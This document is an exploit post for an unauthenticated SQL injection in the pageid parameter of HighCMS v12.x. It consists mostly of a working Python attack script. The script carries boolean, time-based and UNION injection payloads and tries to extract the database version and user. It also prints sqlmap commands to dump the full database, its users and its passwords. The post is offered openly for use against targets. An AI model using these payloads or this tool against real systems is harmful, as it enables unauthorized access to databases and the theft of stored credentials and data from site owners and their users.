============================================================================================================================================= | # Title : HighCMS v12.x SQL Injection Exploit | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) | | # Vendor : https://aryanic.com/ | ============================================================================================================================================= POC : [+] References : https://packetstorm.news/files/id/167170/ [+] Summary : a critical SQL Injection vulnerability in HighCMS/HighCMS version 12.x. The vulnerability allows unauthenticated attackers to execute arbitrary SQL queries through the pageid parameter, potentially leading to complete database compromise. [+] POC : python poc.py #!/usr/bin/env python3 """ HighCMS/HighCMS v12.x SQL Injection Exploit Author: indoushka Vulnerability: SQL Injection in pageid parameter """ import requests import sys import urllib3 from argparse import ArgumentParser # Disable SSL warnings urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class HighCMSExploit: def __init__(self, target): self.target = target.rstrip('/') self.session = requests.Session() self.session.headers.update({ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive' }) def check_vulnerability(self): """Check if target is vulnerable to SQL Injection""" print(f"[*] Checking vulnerability for: {self.target}") # Test payloads test_payloads = [ "6528' AND '1'='1", "6528' AND '1'='2", "6528' AND SLEEP(5)--", "6528 UNION SELECT 1,2,3,4,5--" ] vulnerable = False for payload in test_payloads: url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}" try: # Time-based SQL injection test if "SLEEP" in payload: import time start_time = time.time() response = self.session.get(url, timeout=10, verify=False) end_time = time.time() if end_time - start_time >= 5: print(f"[+] Time-based SQL Injection confirmed! (Delay: {end_time - start_time:.2f}s)") vulnerable = True break else: response = self.session.get(url, timeout=10, verify=False) # Check for error-based indicators error_indicators = [ "SQL syntax", "Microsoft OLE DB Provider", "ODBC Driver", "SQLServer", "Unclosed quotation mark", "syntax error" ] for error in error_indicators: if error.lower() in response.text.lower(): print(f"[+] Error-based SQL Injection confirmed!") print(f"[+] Payload: {payload}") vulnerable = True break # Boolean-based test if "'1'='1" in payload and response.status_code == 200: true_response = response.text if "'1'='2" in payload and response.status_code == 200: false_response = response.text if true_response != false_response: print(f"[+] Boolean-based SQL Injection confirmed!") vulnerable = True break except Exception as e: print(f"[-] Error testing payload {payload}: {e}") continue return vulnerable def exploit_union(self, columns=5): """Exploit using UNION-based SQL injection""" print(f"[*] Attempting UNION-based exploitation with {columns} columns") # Test different column counts for col_count in range(1, columns + 1): nulls = ','.join(['NULL'] * col_count) payload = f"6528 UNION SELECT {nulls}--" url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}" try: response = self.session.get(url, timeout=10, verify=False) if response.status_code == 200 and "error" not in response.text.lower(): print(f"[+] UNION injection successful with {col_count} columns") # Now extract data self.extract_data(col_count) return True except Exception as e: print(f"[-] Error with {col_count} columns: {e}") return False def extract_data(self, column_count): """Extract database information""" print("[*] Extracting database information...") # Get database version version_payloads = [ "6528 UNION SELECT 1,@@version,3,4,5--", "6528 UNION SELECT 1,version(),3,4,5--", "6528 UNION SELECT 1,banner,3,4,5 FROM v$version--" ] for payload in version_payloads: url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={payload}" try: response = self.session.get(url, timeout=10, verify=False) if response.status_code == 200: # Look for version information in response print("[+] Database version information extracted") break except: continue # Get current database user user_payload = f"6528 UNION SELECT 1,user(),3,4,5--" url = f"{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid={user_payload}" try: response = self.session.get(url, timeout=10, verify=False) print("[+] Current user information extracted") except: pass def generate_sqlmap_command(self): """Generate sqlmap command for automated exploitation""" sqlmap_cmd = f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --level=5 --risk=3' print("\n[+] SQLMap Commands:") print("=" * 50) print("# Basic detection:") print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch') print("\n# Full database dump:") print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --dump-all') print("\n# Get database users:") print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --users') print("\n# Get database passwords:") print(f'sqlmap -u "{self.target}/index.jsp?siteid=1&fkeyid=&siteid=1&pageid=6528" --batch --passwords') def main(): banner = """ ██╗███╗ ██╗██████╗ ██████╗ ██╗ ██╗███████╗██╗ ██╗██╗ ██╗ █████╗ ██║████╗ ██║██╔══██╗██╔═══██╗██║ ██║██╔════╝██║ ██║██║ ██╔╝██╔══██╗ ██║██╔██╗ ██║██ █╔╝██║ ██║██║ ██║███████╗███████║█████╔╝ ███████║ ██║██║╚██╗██║██╔══██╗██║ ██║██║ ██║╚════██║██╔══██║██╔═██╗ ██╔══██║ ██║██║ ╚████║██████╔╝╚██████╔╝╚██████╔╝███████║██║ ██║██║ ██╗██║ ██║ ╚═╝╚═╝ ╚═══╝╚═════╝ ╚═════╝ ╚═════╝ ╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ HighCMS/HighCMS v12.x SQL Injection Exploit By: indoushka """ print(banner) parser = ArgumentParser(description='HighCMS SQL Injection Exploit') parser.add_argument('-u', '--url', required=True, help='Target URL (e.g., https://example.com)') parser.add_argument('--check', action='store_true', help='Check vulnerability only') parser.add_argument('--exploit', action='store_true', help='Run full exploitation') parser.add_argument('--sqlmap', action='store_true', help='Generate sqlmap commands') args = parser.parse_args() exploit = HighCMSExploit(args.url) if args.check: if exploit.check_vulnerability(): print("\n[!] Target is VULNERABLE to SQL Injection") else: print("\n[!] Target does not appear to be vulnerable") elif args.exploit: if exploit.check_vulnerability(): print("\n[*] Starting exploitation...") exploit.exploit_union() elif args.sqlmap: exploit.generate_sqlmap_command() else: # Default: check and provide options if exploit.check_vulnerability(): print("\n[+] Vulnerability confirmed!") print("\nAvailable options:") print("1. Run full exploitation: python exploit.py -u TARGET --exploit") print("2. Generate sqlmap commands: python exploit.py -u TARGET --sqlmap") else: print("\n[-] Target not vulnerable or not accessible") if __name__ == "__main__": if len(sys.argv) == 1: print("Usage: python highcms_exploit.py -u https://target.com") print("Options: --check, --exploit, --sqlmap") sys.exit(1) main() Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================